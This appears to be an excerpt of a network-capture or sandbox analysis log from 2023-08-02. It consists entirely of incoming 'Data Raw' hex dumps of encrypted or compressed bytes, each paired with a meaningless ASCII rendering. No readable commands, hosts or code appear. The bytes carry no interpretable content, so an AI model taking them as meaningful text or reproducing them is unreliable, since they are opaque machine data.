                                                          2023-08-02 08:16:22 UTC1951INData Raw: a1 04 c7 fc 68 c0 2d a4 fa 2d 47 f8 43 39 e0 c5 3c a6 c6 f6 d3 bb c2 27 9a 63 3b 54 2d 23 05 c3 38 f8 90 ce c3 81 ec 67 6b ca be f5 ed 81 55 59 2b c0 66 9c e4 87 76 cd 87 00 59 fd 4f 8a a8 5d 3f ec 37 1f a9 e7 a5 c7 41 c0 11 5d 28 93 59 ce 40 f0 4f 30 e5 80 0e 9d 23 db fb a9 65 2d f8 03 25 09 48 c5 e4 e3 61 22 0a e9 7f 91 77 f7 76 e3 4b 5c 25 f8 c4 3f ed 6a 72 85 89 38 5d 97 24 bb db 48 5b 0a b6 ab fc 58 e4 e6 07 12 2b 85 73 72 8c d5 35 98 8b ba 26 d9 2d 22 11 29 61 cb ea 81 f5 f4 54 c6 a9 0b 9c ae 2c 01 a6 75 3a 1c 0b da 84 5b 3a 92 d4 ad b4 ec 5c 2f d6 a7 d3 3e 46 72 1e c3 af c5 a3 7b 72 9c a9 a6 93 38 e8 a0 53 63 29 a4 fa 39 5a 48 fd 34 ae ee 7e b0 82 1c 50 7c e0 43 48 2f bb aa dc 88 bf 0f c0 0b 49 c5 ea 1e 9b fe 64 e7 a2 2d e4 17 96 2f 65 e9 91 6a 14
                                                          Data Ascii: h--GC9<'c;T-#8gkUY+fvYO]?7A](Y@O0#e-%Ha"wvK\%?jr8]$H[X+sr5&-")aT,u:[:\/>Fr{r8Sc)9ZH4~P|CH/Id-/ej
                                                          2023-08-02 08:16:22 UTC1967INData Raw: 49 6e 99 4b 63 c0 3b 9b c8 4d fe dc 8e 26 a0 65 59 7c fd c7 19 9b 5d 8e 3b 32 f7 17 5a 09 14 c6 fb 28 05 cb 20 83 43 cc 7c dc 2c a8 06 31 f1 a2 e9 ec 3e 7a 28 93 e4 29 b5 27 e5 b6 38 aa e3 6c 9b a8 07 b0 d9 1a b3 1d a3 cb 1d 76 05 07 b1 19 37 f4 e1 0e 21 d5 f2 ea eb c6 d9 d1 3d 51 53 4e 58 5f 0d 84 d3 16 e5 fd e5 c8 b1 40 56 31 c3 fb 3a c8 43 ab 83 83 81 98 b6 d7 e5 71 ad 54 5a 5d 50 50 8d 77 ad ec df 9d 0c 2f 74 ee d3 bb cf 05 5d 00 69 d9 db ed 6e d9 fd 00 f9 8e 5a 4a c6 d3 8a c5 6b 52 a3 3a 52 a0 45 e1 60 ef 67 8d 26 48 27 ab 4d 0f ad e7 94 a9 13 99 d6 8b 71 2a 36 8d b5 bd 83 95 53 2a 7c b9 9b 98 d5 23 6f 62 56 21 7a 8a 74 b8 ac 8f e7 27 d9 c1 c8 10 32 8d e6 30 e7 57 92 58 dd 90 bb f7 9c bf af 66 1d b9 44 45 dc 3b 0e d9 f3 3c 23 dc ef 80 ee e7 07 c3 52
                                                          Data Ascii: InKc;M&eY|];2Z( C|,1>z()'8lv7!=QSNX_@V1:CqTZ]PPw/t]inZJkR:RE`g&H'Mq*6S*|#obV!zt'20WXfDE;<#R
                                                          2023-08-02 08:16:22 UTC1983INData Raw: 0d 2b a5 95 a1 39 cf f5 19 37 77 f2 c7 76 84 82 10 97 fd 31 2f ce b0 9b 71 60 2a a1 e3 9b 0a 8c db 7e 08 a7 46 15 db 4f 39 66 1d 0b 17 33 60 0d 60 84 f6 4b d0 e6 5a cb de 5d ff e2 f8 16 64 0a 9b 8f a5 30 c0 35 73 5e 2d fe b4 85 63 b1 c4 9f 82 b8 c7 95 5c 79 f5 00 3d ab 6f 75 e4 8f f5 40 0a 22 9d c8 3f e5 c1 a8 9a f9 0d c5 4a cf 41 50 e8 ce 93 42 89 c1 f5 31 f8 46 5a fe 11 a3 c0 10 27 99 c7 16 a0 f8 6b ff bb 11 58 db 6b f0 06 ff 22 b4 b6 c8 dc 98 99 2c f9 f1 9e 2b 3e 10 f8 d2 ca 67 e8 f7 a6 c0 41 41 31 ce b5 4e 12 b6 70 12 d0 df f3 da a9 72 a7 90 00 28 c4 49 56 9b 0d f0 74 d8 2e 3d 85 d7 1f 01 56 fd eb 72 92 4b 73 35 6f 58 4c dd 92 cb 7c 47 b3 fb 82 e6 a8 99 c9 38 4d 7c a0 0d ee ae e4 e9 aa 39 b3 e1 26 bb e8 b1 ba 89 87 2e 16 54 c6 1c 42 56 af c1 9f 7c a9
                                                          Data Ascii: +97wv1/q`*~FO9f3``KZ]d05s^-c\y=ou@"?JAPB1FZ'kXk",+>gAA1Npr(IVt.=VrKs5oXL|G8M|9&.TBV|
                                                          2023-08-02 08:16:22 UTC1999INData Raw: 0d f1 9a 83 af 28 ae a2 68 c9 8d 2a 6c 06 cb a4 dd 91 46 fc 62 97 0f fe 8d 27 68 b4 a4 6d 63 df a9 20 3d 47 08 fb 09 7e 2d d8 ff 5f 30 8f 2d c4 3e bb 63 1b 40 70 c5 f1 e9 bf 57 93 8c 54 8e ec f2 ac b6 ec a8 6b 6a bc a6 1d 10 a8 51 ea 91 12 ff 17 a0 51 a5 5d e0 f2 9d 07 a9 95 20 5a dc f0 5c 22 98 18 6f f3 a3 69 c2 a0 1f e3 fd b4 a2 82 9a 70 5f 1f 05 69 4a cc 51 0e 40 cb 3a 8a fa 58 ab 93 d3 62 10 d0 60 5d 95 59 bd b1 6a b3 c9 4a dc 73 ca 5d 62 e2 c2 76 9c 7b fe 87 93 fe d5 dc 76 92 cd a2 40 b4 0d 38 89 20 09 ce 57 5d ae 3b 61 82 a6 dc 38 86 aa 1e c9 07 ec cc 9d b7 2b 08 36 01 c7 63 1e 46 df 16 4e 13 57 c9 6e 91 52 00 8e 88 ca c9 79 c3 c0 48 32 dd ff 22 61 09 56 e1 f4 cf 0f 0d 67 ac c3 ad 33 07 35 72 21 54 ae ac d1 cf a5 6a 6c 42 3e 4f 8d 24 f2 98 2a 27 bb
                                                          Data Ascii: (h*lFb'hmc =G~-_0->c@pWTkjQQ] Z\"oip_iJQ@:Xb`]YjJs]bv{v@8 W];a8+6cFNWnRyH2"aVg35r!TjlB>O$*'
                                                          2023-08-02 08:16:22 UTC2015INData Raw: 52 96 fa 86 c9 6b 5e 86 57 6e 71 c7 5e ea 65 0f 80 a4 c9 04 5f fa 94 dd 75 29 ca 3f 02 9f 5f 89 aa 28 38 23 08 58 60 ae ad 20 b2 23 ea 9e 07 bb 8d a0 75 10 cc cd d3 ec 9b 2a 99 03 72 65 a4 ea 45 46 98 d9 d3 6b b5 2d a5 97 c7 61 ae 6a 65 ad 5c db c1 90 95 5b 3b 52 67 21 5f 2e 64 78 d8 73 7c 94 a6 e8 a1 19 3e f3 8e c1 dd 32 78 6e 17 5a 2e e5 c5 9b 05 f0 56 95 02 f2 4b f1 37 dc 11 ac dd b7 85 d0 bb 0a 5e 7d 1d 16 81 24 24 3c 21 a9 27 51 a1 f8 02 20 11 cb 86 62 9f 7a 2c ec 76 13 bc bc c8 28 65 a5 7c 38 01 02 cc b6 6f 43 86 b0 50 dd e4 b3 d4 b1 f1 05 a7 fa e3 85 c1 c4 10 3a 95 57 95 e4 7d dc 04 8e bb 27 e5 73 91 f1 6c f6 b6 ef a7 aa 32 43 ff c5 44 b4 62 b2 21 73 d7 0e 7c 06 54 20 ea ae 6c 47 24 55 2e 55 8b fa d4 bb df 04 d0 7f 71 fb 8f 54 54 0a 2a bf dc 0c 4d
                                                          Data Ascii: Rk^Wnq^e_u)?_(8#X` #u*reEFk-aje\[;Rg!_.dxs|>2xnZ.VK7^}$$<!'Q bz,v(e|8oCP:W}'sl2CDb!s|T lG$U.UqTT*M
                                                          2023-08-02 08:16:22 UTC2031INData Raw: 74 d1 bc 41 17 f3 9a b7 e6 18 cf 4b 4c ff b0 73 a3 f9 d6 04 c7 da e3 6f a2 9a 5f 2a 3f a7 de 9f 59 11 25 b9 78 09 0d 49 ae 52 15 d6 73 ed ef f4 81 55 f6 bc 2e 26 37 3d de e3 47 f5 d7 21 5b 37 8b 92 05 56 8d 69 58 d7 d1 63 00 05 c6 65 f2 2f cc 80 3f 1a bb 73 92 99 ba 8b 7e 8c d5 86 b6 15 bf ad ec 38 0b 2f 0b 65 37 ef 3a d5 a2 d1 b9 37 2e 54 8c 74 cc dc 0f 60 b7 1c 83 85 89 f9 4a ae 2a da 38 f6 5c fa 25 13 db 6d ce 5c 4c 3a 77 af 65 32 b6 3b a6 a7 77 9c 65 87 7f cd 3b 7b c9 44 65 62 22 3a ad 4d cd 14 7f fb 8b a9 2e 41 2f e3 94 62 8b e3 1d 0b 10 5d 93 f9 df 63 c3 ff 1a fa 01 5b 4e da 34 ab f3 78 24 65 6f 0c 18 0f 65 82 dc ae 03 be 1c a6 56 55 dc a9 26 11 84 73 e5 b5 cf be d8 1e b9 a1 44 d1 01 1b 5c a1 60 1b 2a 67 8d 42 cf 61 09 9b bd c6 2c 46 8d b1 a5 3a c7
                                                          Data Ascii: tAKLso_*?Y%xIRsU.&7=G![7ViXce/?s~8/e7:7.Tt`J*8\%m\L:we2;we;{Deb":M.A/b]c[N4x$eoeVU&sD\`*gBa,F:
                                                          2023-08-02 08:16:22 UTC2047INData Raw: 0b 36 ca 0b 3c b4 15 3b 4e c3 71 12 e1 4d 2e 3c 14 a3 43 30 df f2 92 59 9f 12 4a f5 4e 65 f6 86 d1 d6 59 f7 7b 9b 0d e5 47 b0 8c 30 69 69 37 67 46 72 e6 84 99 e1 9c ee 9d 6a 1f 2c 75 64 a4 a2 16 75 22 e3 12 16 be 02 77 89 60 9d 19 c0 a7 83 15 26 ef 77 bc 52 66 38 a8 54 2e a4 75 b1 68 a9 97 c6 5b 9d 3f a0 b8 5a 56 0a 32 15 47 ae 7b e6 15 26 d2 7a 42 90 54 34 93 c3 76 9c 30 ff 7c 58 27 00 4b e7 38 5a b8 28 d9 2e 5a b6 b9 48 db f3 57 74 c7 1a 4f c9 a6 80 9d 32 6c 30 29 77 da 0c 32 ec a9 66 43 a5 e1 57 cb f6 cd b0 f0 ff 93 b4 f9 8d ab ff a8 fd ef d8 26 04 0a f5 7d 84 9f 36 72 2a 7d e0 53 2b d9 cb 25 0a 8a a7 c4 fc d9 1c 8a 2f 7f dd 43 9f 82 0d b7 c6 cb 0d 56 f1 34 f1 91 5e 45 8a fa df 07 bf 96 17 8d 07 d2 8a 7a 3c 2a e1 38 56 d6 04 08 e6 7f e7 a3 50 01 b7 bf
                                                          Data Ascii: 6<;NqM.<C0YJNeY{G0ii7gFrj,udu"w`&wRf8T.uh[?ZV2G{&zBT4v0|X'K8Z(.ZHWtO2l0)w2fCW&}6r*}S+%/CV4^Ez<*8VP
                                                          2023-08-02 08:16:22 UTC2063INData Raw: 55 64 c5 a2 e2 8a 01 fb 66 59 5c c7 04 26 78 80 f2 ea 93 95 60 f2 03 0e 73 8d 4d 9c c5 c7 99 62 b7 a9 57 10 ca f5 a5 1e e4 cc ae 77 11 b6 b4 fe 58 8a 99 47 e6 df 07 03 3d e1 16 56 90 6b 66 e1 7a 1d 53 02 39 19 31 e2 12 6e 2a 3a d2 2f 1c 19 1b a4 27 b0 6a 9e 8c 86 6b c4 1f 93 66 4e c8 a5 0d 7e 76 85 60 12 5e 5b 88 a8 78 6c 0a 43 9e 5a ca 34 e8 20 9f d0 29 13 ae 1d 9c 90 be c4 8d 07 a3 3f 97 09 77 67 4e 11 2b 21 04 12 1d b7 33 48 4e bb 67 7e 9c 08 bd 24 62 f1 b0 47 6e 62 8d e9 07 9b 7d 15 22 2b 28 c0 79 57 98 da b4 c7 20 46 10 b2 a6 a9 87 ce 80 ef c9 c8 67 e7 82 26 64 80 65 c4 02 30 2d 51 00 7b 06 30 d9 4c d7 7b d2 32 a4 04 ee 1c 89 9b ef a5 35 30 4b d0 f0 bf 7a 83 25 29 20 9a 7c 01 e3 42 b2 c1 35 fc 85 ab 2c ce 3f 2b 3c 6f 6b fc c7 88 38 64 bb ff f4 57 e1
                                                          Data Ascii: UdfY\&x`sMbWwXG=VkfzS91n*:/'jkfN~v`^[xlCZ4 )?wgN+!3HNg~$bGnb}"+(yW Fg&de0-Q{0L{250Kz%) |B5,?+<ok8dW
                                                          2023-08-02 08:16:22 UTC2079INData Raw: 7e 39 a6 e2 7d 46 9d e0 6f b1 e6 e8 2e 59 eb 20 2e 9a 18 09 c0 06 4e 2c c9 c9 2c b5 60 2d 6c cb ec 0b 28 71 7d 38 60 ca 56 b4 90 71 62 0d 04 f4 c3 51 5e 27 52 02 16 06 93 99 d7 76 be 4c 4a 4c b4 19 d3 5b ec bd d2 df c0 eb 46 97 e2 ce c8 84 d6 1b a9 12 6b eb 2e 67 b8 ad 2e c8 cd 5a eb 4e e7 17 e5 69 4f e6 19 66 46 54 a8 50 e6 fa a2 0f 0e ba 84 a5 c0 ed a6 b5 da c2 df aa 59 88 2e 56 8d 53 36 33 34 76 ff c3 08 d4 8f e9 36 2a a8 4b 07 0b b1 05 d0 75 82 1e a6 3e 00 25 b1 2f 9c 68 6e a0 a9 90 ee b9 e9 78 e7 ce 14 f9 d5 51 f6 ad 85 ce 46 39 2d 8e 13 1e 64 62 ad 7d 79 3f 1f ef c7 10 6f 95 85 6f a5 29 77 c6 7d 51 30 9c 2c a4 2a 91 7b 4d 6a 98 f3 86 63 1f 62 a5 00 c7 35 2b 93 5d c0 4c d4 e2 8e 67 99 47 3f bc 59 f1 7c 9c 7b bf 4e 28 71 ca d9 a4 67 34 2f 6d a0 83 74
                                                          Data Ascii: ~9}Fo.Y .N,,`-l(q}8`VqbQ^'RvLJL[Fk.g.ZNiOfFTPY.VS634v6*Ku>%/hnxQF9-db}y?oo)w}Q0,*{Mjcb5+]LgG?Y|{N(qg4/mt
                                                          2023-08-02 08:16:22 UTC2095INData Raw: ab 66 0c ad 55 a8 15 ee e9 e9 7b ba 8c 3b be 33 ae 0e 3e 0f 33 c5 05 40 3c c1 8d e1 99 79 13 a3 f4 5f 73 36 92 80 92 9f 85 d9 c8 06 2a 09 d4 57 87 ba da 3c 93 bc 88 e0 30 5b c0 e3 78 37 f1 6d 84 dc 9d d0 ca 42 2c 84 38 32 3c 2c 39 b5 f7 5e d8 b9 d2 09 63 ea 6f 5a ae 7a 88 e2 20 30 5c 22 ba 4c 69 8d 04 48 b9 de 6f ce aa b7 9b dc 1b f1 d0 14 85 0c a9 c2 4b 8f 7d 78 61 b1 0a 74 df fd 91 1e 10 b0 ad 43 0a 08 0a 3c 2e 2c af 96 46 bc 9d e3 fd 3a aa 97 26 a3 fd f8 f1 71 d9 f7 8b e0 cc ac cb a0 94 a7 2d d3 38 8f 78 05 bb 47 a4 c7 7c 98 bf bf cc 34 5a 19 c2 21 e5 53 0f 63 b4 29 16 52 4d ac 31 d3 d5 69 d9 53 a6 1f 3a 23 49 e6 86 0b e3 b8 bd 4b 32 d6 e4 66 92 a6 5d a4 67 6f fb 99 55 04 e5 a9 9c 73 40 a0 cf 0e d5 78 10 64 a1 89 1a ac ae 99 4a 67 14 a5 14 6b 17 92 2e
                                                          Data Ascii: fU{;3>3@<y_s6*W<0[x7mB,82<,9^coZz 0\"LiHoK}xatC<.,F:&q-8xG|4Z!Sc)RM1iS:#IK2f]goUs@xdJgk.
                                                          2023-08-02 08:16:22 UTC2111INData Raw: ec 67 44 d2 fc 56 e0 6d 55 f5 fa 6f e6 f7 38 14 5d 5a 5d 34 de d6 65 e3 79 1c a4 54 5d 4a 6b 0d f7 90 f8 40 67 d4 ae b3 64 1f b5 4d 06 04 54 36 b6 80 ec ac 5d 31 c6 b7 d3 21 7d 46 f1 39 7f 5a 22 4a 13 d3 84 55 83 f3 26 12 05 8a 9a 66 96 41 33 3f ab 2b 3f cb a0 20 bd ee 96 86 bc 24 20 03 04 52 28 42 44 fb b8 e1 88 d2 31 71 be 0e ae f6 3f b7 13 74 42 f1 47 ea 79 5b f3 09 d3 b1 16 a1 8a aa 53 f8 3a 08 8e 44 bc 18 82 3e 32 e9 0d 5d 33 a4 3d 3a cb 80 7b de 16 8c b6 6f c6 c4 d4 e3 b5 9e 1c 36 dc a9 e1 db a5 eb cd d0 af ee 2f 28 55 3b b8 86 30 5c b1 4b d0 2e 6b f0 a1 91 0b d6 11 d7 17 d1 b7 f5 5d 5c 49 ed 58 13 07 23 20 50 54 c9 25 b8 c8 98 64 76 c7 ad 48 d7 7c ef ce a7 2f fa bf cb 15 11 56 bb 46 f9 f7 a4 27 05 9e 5b 19 22 59 a4 35 9c 91 03 e9 19 fd cd ef da ed
                                                          Data Ascii: gDVmUo8]Z]4eyT]Jk@gdMT6]1!}F9Z"JU&fA3?+? $ R(BD1q?tBGy[S:D>2]3=:{o6/(U;0\K.k]\IX# PT%dvH|/VF'["Y5
                                                          2023-08-02 08:16:22 UTC2127INData Raw: fd 48 36 2d 0b 9e af 58 e2 be f4 dd 88 cf 5e 41 b2 e7 f7 6f 51 4c 1b 2c 48 09 1c ec 86 f2 e9 ba b5 56 a0 50 fa ef c5 d7 74 eb 0c de 09 8a 68 18 90 40 8b 0f fd 3e e5 9f 2d 47 fc 9a 9a f2 1b 40 c8 60 31 45 12 01 2d dc 6e 7d 29 31 50 42 3e a7 80 c4 86 1e 30 3e 9a e5 22 bb 0d 28 1c f6 37 5a 1d 71 40 ba b8 79 0c fb ce 7c 8e 2d 78 a5 57 80 a2 67 df c7 f5 ab 89 b1 72 78 eb db f8 14 c7 be ff 3e 7f f1 44 1b 49 d6 a4 00 d7 c9 3b 6c 8b e9 7e 66 99 88 2b 63 ba dd 3b fd c0 c0 c1 33 29 bb 0c ae 55 2e 44 52 3a 4e db 46 5c 9a 21 10 f9 7f b1 7a a0 55 3f ee 93 af 60 66 68 45 c2 0f 67 6c f1 14 39 61 aa db f9 4b 4c 0e 5f 70 1d c1 b7 bd b3 2a 7f 24 3f 60 b2 f9 44 f4 f8 b5 84 8c 02 68 49 fb 01 f1 69 b5 0e 75 83 f4 c0 d9 f6 4d 36 50 23 5a a5 5f 28 0b dc 0f 3f cc cb 5d bf 4b 7b
                                                          Data Ascii: H6-X^AoQL,HVPth@>-G@`1E-n})1PB>0>"(7Zq@y|-xWgrx>DI;l~f+c;3)U.DR:NF\!zU?`fhEgl9aKL_p*$?`DhIiuM6P#Z_(?]K{
                                                          2023-08-02 08:16:22 UTC2143INData Raw: a3 fe 79 0f 95 a5 02 83 78 69 86 34 c1 e4 26 8e 61 93 4e 7d a6 36 fc ac 3a 50 bd 13 49 00 12 31 f9 f5 e9 94 5d 06 b1 e2 10 f9 97 2a 28 45 e9 36 e8 45 48 4c 89 71 e8 5b 0d 80 98 08 fb f2 62 fd da a3 e6 14 f7 62 9f 4e 44 fc 1e 5c 45 99 d7 6a 8a 2c 3d 08 2a 75 ac c8 2b f7 2f 51 b7 48 75 dc 40 84 fe 3e 5c 89 71 4d 9c e5 fa 8c 48 cf 90 3f 88 e5 76 ed 4f cc c3 e2 1d bd 2a 1d 37 97 d5 ef 1c b9 69 ed 13 a8 a2 34 29 b9 10 c8 bc 67 1f e2 23 4a 92 9d 1a f6 f1 4a 16 c5 42 8a ae cd 8d e7 1b b4 19 5d 3f ca ed 60 c4 20 d6 59 4b 20 f4 7b 03 c0 50 37 fd 34 4c 99 3e 06 c3 66 63 f9 c2 49 1d f8 9b a9 2b 65 54 4d 29 52 41 91 ee 11 0c 40 df bb 5d 1a 08 53 ac dc 7b 88 78 40 a4 4e a9 8d af 89 4e c4 4b 41 52 bd a7 3e 6f 7a 1d 23 d1 77 53 48 b7 b5 8d ee 39 fc 65 53 9f bb 25 4e 23
                                                          Data Ascii: yxi4&aN}6:PI1]*(E6EHLq[bbND\Ej,=*u+/QHu@>\qMH?vO*7i4)g#JJB]?` YK {P74L>fcI+eTM)RA@]S{x@NNKAR>oz#wSH9eS%N#
                                                          2023-08-02 08:16:22 UTC2159INData Raw: 47 27 2a e3 f5 b4 61 97 37 b7 c4 2b 59 7f 1f 0c fa 70 e8 24 8d 4d 48 ea 8c f0 8a bc af d6 f5 e0 e0 7c b7 76 6f 9e ed e8 f5 74 08 56 fc 01 dc 77 15 d7 5c 9e 14 bb 8c 71 ce 9c 47 57 7e f3 14 c7 11 6b 39 66 21 ee 82 af dc 99 50 31 3f 90 86 d0 ae 38 7f bb 3c a0 ae 98 e2 99 c9 79 8d 5b ce 18 cc 72 1d ab 7b de de 82 3b 2e e4 69 74 cb af 50 71 6b b8 a6 d1 5a b4 59 7b ac 06 a6 8c 34 cb 3a 31 6b 60 70 f3 7e ad b5 d9 5c ea 9d c6 b1 7d a8 0a e8 bf 76 1c 48 9b 75 41 bd 9a 98 a2 85 94 eb 1d 5e ae 59 fe 5c a8 f5 97 fd eb 05 12 37 42 48 23 61 1a c8 38 ed 6f 9f 12 c4 a9 21 03 eb 00 67 dc 4e 60 be be 93 d9 92 53 fb 49 7b 02 f3 83 7a 76 c7 41 d4 1a 86 c3 bb 02 ec ad 48 74 23 41 89 4f fa d9 1b fe 7a d1 1f aa f9 e2 cf 36 c3 da b7 39 50 d3 8b 7f cc 37 13 d9 db 8f a8 6a 9a 3e
                                                          Data Ascii: G'*a7+Yp$MH|votVw\qGW~k9f!P1?8<y[r{;.itPqkZY{4:1k`p~\}vHuA^Y\7BH#a8o!gN`SI{zvAHt#AOz69P7j>
                                                          2023-08-02 08:16:22 UTC2175INData Raw: d0 70 5d fc 9c a7 18 cb a6 c8 a2 65 64 20 3d 86 fa 98 f1 0a b5 78 19 06 81 5b 59 32 0e b6 42 be f6 38 30 c6 d8 d2 0d 68 2c 85 49 78 58 cc ba d1 9f 10 8e 52 81 04 29 a6 9b e2 2a 0f a7 b7 ba 80 8b 10 44 0e 0a 7d ed 0b 91 98 6d 97 8c f3 6e 9d ca 14 11 1f d4 66 7d e5 64 2c 1a 2e 79 62 14 32 f2 c6 30 2a 2f 67 6b 12 7a 5a de 70 1a 56 e0 cd 9f 07 69 24 6c 2c a0 58 ae 79 5f 37 3d 59 e9 91 dc 2d 8e 80 f2 ae 51 ea c6 e2 9c 84 52 db b1 7d 11 05 2e 61 54 a1 11 0b ed 16 ea 0d 70 1d f1 90 8b 07 99 6f 2f a4 8d 84 9c f5 25 32 29 97 06 7f 7b 2b 63 92 c1 46 8e 74 e9 3a 42 f4 df 0f ad 28 9a 41 c3 0d 86 44 0f a6 22 89 1f 43 ce 98 07 b2 87 ec 1f f1 7e 20 ab f4 06 93 74 c8 70 03 f0 f6 59 8b 18 5e 95 30 b1 9c 21 40 4c e9 b7 83 31 de 70 5e 44 21 17 42 8a 3f 62 42 f6 fb ca 48 29
                                                          Data Ascii: p]ed =x[Y2B80h,IxXR)*D}mnf}d,.yb20*/gkzZpVi$l,Xy_7=Y-QR}.aTpo/%2){+cFt:B(AD"C~ tpY^0!@L1p^D!B?bBH)
                                                          2023-08-02 08:16:22 UTC2191INData Raw: 14 20 97 46 e2 a9 e8 5a 99 9f 72 f7 d0 90 93 1c 73 f8 ed 9f bb 13 af 72 08 7d 53 ea 9f fe 1f f4 f1 85 74 b6 3d 73 91 8c bd e7 cd 36 3c 16 5f 82 b5 55 3f 7e 27 4c c1 83 39 16 27 fe a9 e5 43 64 e9 3c 76 9d de 96 a1 11 8a 40 2d 38 c8 19 55 2c 06 57 ab a9 eb c2 4c 9b f0 8a 63 03 bd 0f 69 bc 4e 20 52 fc 29 69 92 8e 73 36 1a 94 55 17 45 22 d0 fa a2 e9 3b ef b2 9f a1 40 39 e7 e0 8c f5 b2 f6 38 f5 cd f4 89 e2 f9 b4 a3 2c c3 df 58 c6 3d d6 81 a6 60 04 89 18 1b 72 02 65 5e d9 1f 90 fd c9 6d 0a cd 73 f7 ad 14 14 9e 0d 2a 8d b3 aa e5 b5 b8 78 5d 60 5e 5e 31 a3 6e 17 79 44 47 7b a5 84 29 9f 0e 4a 8b a7 c5 a3 db fb 48 44 5e 49 7c 24 67 79 e2 85 69 43 09 cc 91 3b 5f c3 9b 7b 4f ec 58 49 dc 1c aa bc 5b e0 f9 43 cb 2e 20 56 84 95 cb aa 7f 4f 8d d3 1b be 94 ed 46 e6 c9 e0
                                                          Data Ascii: FZrsr}St=s6<_U?~'L9'Cd<v@-8U,WLciN R)is6UE";@98,X=`re^ms*x]`^^1nyDG{)JHD^I|$gyiC;_{OXI[C. VOF
                                                          2023-08-02 08:16:22 UTC2207INData Raw: da d9 e7 08 56 34 b4 05 fa f8 a8 be 52 08 97 ec 20 9d 67 59 ff d1 50 fc 8c 1b e5 24 ce 3b 32 98 3c 79 7f f5 1e dd 2c d4 8a ff 1d 32 5e 1c 79 0b df a2 21 94 9b 15 92 b0 81 4e 68 90 15 18 a0 c0 da 78 69 10 bc 1a b4 98 fe 47 83 28 92 28 0c cc 3a 69 48 4e 21 fe 72 af 3e c7 98 ec c5 0b b3 c0 08 da 72 cc 07 29 05 91 3b 23 fc aa a9 ef 56 6d 9e 0d 98 90 3d 15 26 d6 96 46 b7 0e 94 cd 7a 10 93 40 6c 13 04 5d a4 f9 29 5c 66 b9 68 de 84 1d e7 d1 c7 74 41 b9 af 44 dd 5b 76 9b 1b 3b 63 fd 0b 74 f5 3e bc dd 50 8a 5c cb 2b df da 94 b1 f1 7f ed 01 f4 f5 28 ef d1 d8 ac 38 d8 72 4a 40 b8 da cd dd 54 e7 ac a1 b3 46 bc 2e fb 68 dd 87 60 14 cb ac 40 82 b0 68 36 ac 8a bc df f9 8e 5a 1a b7 8c 4c c5 99 3d da 60 de 3d 5f 38 c0 cc f0 05 c2 17 40 e7 db 81 f9 2b c9 9e 4b 70 5c dc 2a
                                                          Data Ascii: V4R gYP$;2<y,2^y!NhxiG((:iHN!r>r);#Vm=&Fz@l])\fhtAD[v;ct>P\+(8rJ@TF.h`@h6ZL=`=_8@+Kp\*
                                                          2023-08-02 08:16:22 UTC2223INData Raw: 01 30 c3 51 ba 5e e6 ea 9a 49 7b ac 4b 6b 23 1c 2e 0d e7 0c df 5a 00 8d fa 1b bb 7d 0a 61 90 5f 21 e5 c9 86 63 8b 5f f1 07 37 83 ab fe 6a 1e 9a 90 41 91 5a d7 4b b2 ed f5 af ba 78 26 f0 a4 61 2b 9c 90 86 eb 0a ce 2a 50 08 4e fc 2e 6c d4 40 b8 51 fb 3e 2c 12 7c f4 31 bb fa e9 5b 1e f0 bf bb 9c ba dc b9 71 5c e7 1d 19 0f 85 e7 09 f7 d8 32 4f 90 97 de e7 0a 60 45 b3 86 66 0b 89 e9 d0 75 1e 82 f6 f0 0e 5f b1 30 d2 1a 36 f4 55 e3 57 86 0b e8 62 61 bf 84 19 02 52 83 24 ef a1 dc 20 05 6a 28 b0 0c af 6f 0b 83 6e 71 2a 3d 6c 2a 7f 52 dd 74 75 78 e6 e3 91 29 58 58 ac fb 21 62 dd 91 fd 0e 0d 73 e9 b6 cb e8 f3 f4 8a a6 f7 30 86 32 d6 0b 44 3e 0f 5a 1d 49 af d9 f4 1f 1c 02 ad 24 b0 90 54 98 ef ee 8f 9d 8e 8a b3 a5 c7 92 a0 eb aa 0d 8f 5b 15 5a 38 82 6a b0 37 90 ee de
                                                          Data Ascii: 0Q^I{Kk#.Z}a_!c_7jAZKx&a+*PN.l@Q>,|1[q\2O`Efu_06UWbaR$ j(onq*=l*Rtux)XX!bs02D>ZI$T[Z8j7
                                                          2023-08-02 08:16:22 UTC2239INData Raw: 3c be ad 2b 1e cf a2 17 b6 b2 d8 d3 75 dc 4d 01 83 57 74 2e 2e 29 68 63 12 74 73 d1 65 da 0a eb 62 c6 08 f1 80 7a af dd 39 f4 2e f4 1e 68 3e 72 c9 ad 58 b3 5b 8d 4f c3 6e e2 91 9c fb ec 4b 27 e8 4e 26 ca 2b eb 11 88 5a 00 b4 a4 cc 19 86 e1 6c 00 5d 33 fe d7 e9 b2 db f7 19 5d 9a 59 75 22 bb c7 f1 83 dc d9 6f 82 e3 a5 90 cb 9c 1c 29 8a 6c e5 9a 0c 4d ed 67 c7 43 36 31 36 f2 61 c1 0b d8 48 32 5e a8 52 21 13 ca 30 20 d2 8f ea 6e fe e1 3d 87 ae 35 3b 8b b8 98 3f dc 76 20 1c 3b 47 1b c6 ac 11 6a 52 5e 61 15 aa 35 89 76 dc f9 10 df 4b eb 68 a7 66 4b 37 96 1e 8e 08 27 95 bd dc 87 1e 67 fa 80 50 71 8f 73 b5 b8 9a 6e 56 b2 32 69 1b 55 5f a4 04 1e ff 72 4e 2a 58 93 55 ba c4 12 11 eb 6e 7c f5 c8 92 7e 68 06 f4 67 4c 79 72 45 45 86 45 50 72 a1 3f 09 50 d3 42 28 8f 1d
                                                          Data Ascii: <+uMWt..)hctsebz9.h>rX[OnK'N&+Zl]3]Yu"o)lMgC616aH2^R!0 n=5;?v ;GjR^a5vKhfK7'gPqsnV2iU_rN*XUn|~hgLyrEEEPr?PB(
                                                          2023-08-02 08:16:22 UTC2255INData Raw: cd e4 4b 5a 7b a7 b9 e8 46 b5 35 de c5 a6 e5 a8 0f 77 31 3f 87 df f6 8b 66 52 31 f8 6d 88 44 ac 70 85 81 ed cb 43 3b ad 29 ab 01 79 4e e8 0a bf ca 75 48 52 fb c2 93 78 46 4b e7 b6 5f b6 b1 5f 51 62 cd 4a 91 c7 43 b4 1e 0f be 4b e7 8d 9f c5 71 b7 90 f4 31 31 9e cd bd 07 c8 cb d0 f6 c6 0a 56 52 5b 05 5f e8 ee 59 79 db 62 ba d2 5c cf bc 91 c7 2b 1f 21 48 a6 85 6f d1 8d 52 cd cf 26 b3 f1 5e 23 39 35 9e ca 33 af 5b be ca d0 6d 9a 33 80 34 8b d8 1e 31 e2 46 2f 18 a2 8f cf 17 64 e0 6e f1 7b 73 a8 1e bc 76 8f 80 88 b7 19 58 8c 25 4d 34 ec 78 79 5c 45 24 28 27 fd ad 99 5f 4f f0 8e 7a 71 bc c7 8b b4 4c 48 44 93 41 93 8d cd 94 c7 25 87 